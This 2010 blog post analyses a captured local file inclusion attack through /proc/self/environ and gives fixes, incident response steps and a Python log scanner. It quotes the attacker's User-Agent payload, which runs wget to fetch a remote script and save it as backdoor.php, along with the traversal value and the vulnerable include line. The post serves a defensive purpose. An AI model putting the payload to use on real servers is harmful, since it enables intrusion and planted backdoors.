Friday, June 25, 2010

The proc/self/environ Injection

Event Details

21 June 2010

POST Values
file: ../../proc/self/environ

HTTP_USER_AGENT: <? exec("wget http://[remotescript].txt -O backdoor.php"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have here is a local file inclusion (LFI) attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this, passing the request parameter straight to include:

// Include file requested (vulnerable: the path comes straight from the visitor)
include $_POST['file'];

Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details of the Apache process serving the request. /proc/ contains information about all running processes, and /proc/self/ is the entry for the process that is reading it. Apache exposes various request values through /proc/self/environ (the process's environment variables), such as the visitor's IP address, user agent, the script called and other values like this:

DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)

However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that value will be included and, because it contains PHP tags, executed as PHP code. The PHP code would then run a shell command to retrieve a remote script, download it to the server and place it in the website folder:

// Fetch the remote script and save it as backdoor.php in the web root
exec("wget http://[remotescript].txt -O backdoor.php");

Now the hacker can visit his page and run any commands he wants on your webserver.

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      // array_search() returns FALSE (not NULL) when nothing matches, so test with !== false;
      // the third argument forces a strict comparison
      $allowed_index = array_search($_GET['file'], $allowed_files, true);
      if ($allowed_index !== false) {
          include $allowed_files[$allowed_index];
      }

    • Don't let visitors specify a file by name; map a short key to the file instead

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      // Only a known string key selects a file; anything else is ignored
      if (isset($_GET['file']) && is_string($_GET['file']) && isset($allowed_files[$_GET['file']])) {
          include $allowed_files[$_GET['file']];
      }
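The two defences above, a containment check that rejects paths escaping the document root and an allowlist keyed by short name, written out in Python as an added example (not code from the original post). The document root `/var/www` and the file names are assumed, taken from the post's own examples; the traversal value tested is the one from the captured request.

```python
import os
from typing import Dict, Optional

# Constructed for this example: the document root and the files a page may include.
DOC_ROOT = "/var/www"
ALLOWED_FILES: Dict[str, str] = {"file1": "file1.php", "file2": "file2.php"}


def resolve_inside_docroot(requested: str, doc_root: str = DOC_ROOT) -> Optional[str]:
    """Containment check: return the absolute path for `requested` only if it
    still lies under doc_root once '..' components (and symlinks) are resolved.

    If `requested` is itself absolute, os.path.join discards doc_root, so an
    input such as "/proc/self/environ" also lands outside the root and is
    refused. Returns None for anything that escapes.
    """
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    # The longest common prefix of root and candidate must be root itself.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def select_include(key: Optional[str]) -> Optional[str]:
    """Allowlist by key: the visitor supplies a short name, never a path.
    Unknown or non-string keys map to nothing, so there is no path to
    traverse in the first place.
    """
    if not isinstance(key, str):
        return None
    name = ALLOWED_FILES.get(key)
    if name is None:
        return None
    return os.path.join(DOC_ROOT, name)


if __name__ == "__main__":
    # The traversal from the captured request, an absolute path, and a legitimate file.
    for req in ("../../proc/self/environ", "/proc/self/environ", "file1.php"):
        print(f"containment {req!r:28} -> {resolve_inside_docroot(req)}")
    for key in ("file1", "../../proc/self/environ", None):
        print(f"allowlist   {key!r:28} -> {select_include(key)}")
```

The allowlist is the stronger of the two: with the containment check a visitor can still name any file under the document root, whereas the key map exposes exactly the files you listed and nothing else.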

Threat Level

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor your logs. The hacker will probably return and attempt to reinfect your server.
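A small scanner for the log-review step above, added here as an example and not part of the original post. It parses Apache "combined" access log lines, flags requests that reference /proc/self/environ, contain directory traversal, or carry PHP tags in the User-Agent, and then lists every path each flagged IP requested so the files it touched can be inspected for backdoors. The log lines, IP addresses and timestamps are constructed for the example; the payload in the first line is the one from the captured request.

```python
import re
import urllib.parse
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed sample in Apache "combined" format (not real log data). Apache
# writes quotes inside a logged header as \" . The POST body of the captured
# request (file=../../proc/self/environ) is not in the access log at all; only
# the GET variant of the same attack shows the traversal in the request line.
SAMPLE_LOG = r'''
203.0.113.7 - - [21/Jun/2010:03:14:07 +0000] "POST /index.php HTTP/1.1" 200 2310 "-" "<? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>"
203.0.113.7 - - [21/Jun/2010:03:14:09 +0000] "GET /backdoor.php HTTP/1.1" 200 87 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
198.51.100.23 - - [21/Jun/2010:03:20:41 +0000] "GET /index.php?file=..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Jun/2010:03:21:00 +0000] "GET /index.php?file=file1 HTTP/1.1" 200 1024 "http://example.com/" "Mozilla/5.0"
'''.strip().splitlines()

# Combined log format; the user-agent group accepts backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def indicators(entry: Dict[str, str]) -> List[str]:
    """Name the attack indicators present in one parsed entry (empty list = clean)."""
    found: List[str] = []
    # Decode percent-encoding first so "..%2F..%2Fproc" is seen as "../../proc".
    target = urllib.parse.unquote(entry["path"])
    if "proc/self/environ" in target:
        found.append("proc-self-environ-in-request")
    if "../" in target:
        found.append("directory-traversal-in-request")
    ua = entry["ua"]
    if "<?" in ua or "?>" in ua:
        found.append("php-tags-in-user-agent")
    return found


def scan_log(lines):
    """Scan log lines; report findings, the flagged IPs and every path those IPs requested."""
    flagged_ips: Set[str] = set()
    findings: List[Dict[str, object]] = []
    paths_by_ip = defaultdict(set)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        # Record the script (without query string) each IP hit, for follow-up.
        paths_by_ip[entry["ip"]].add(entry["path"].split("?", 1)[0])
        reasons = indicators(entry)
        if reasons:
            flagged_ips.add(entry["ip"])
            findings.append({"ip": entry["ip"], "time": entry["time"],
                             "path": entry["path"], "reasons": reasons})
    # Every script a flagged IP touched is a candidate backdoor to inspect or remove.
    followup = {ip: sorted(paths_by_ip[ip]) for ip in flagged_ips}
    return {"findings": findings, "flagged_ips": flagged_ips, "paths_by_flagged_ip": followup}


if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG)
    for f in report["findings"]:
        print(f'{f["time"]} {f["ip"]} {f["path"]} -> {", ".join(f["reasons"])}')
    for ip, paths in report["paths_by_flagged_ip"].items():
        print(f"{ip} requested: {', '.join(paths)}")
```

Run it over a real log with `scan_log(open("/var/log/apache/access.log").read().splitlines())` (path as on your system). The follow-up list is what turns an IP address into a list of files to check: in the sample, 203.0.113.7 requests /backdoor.php right after the injection, which is exactly the file the payload created.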

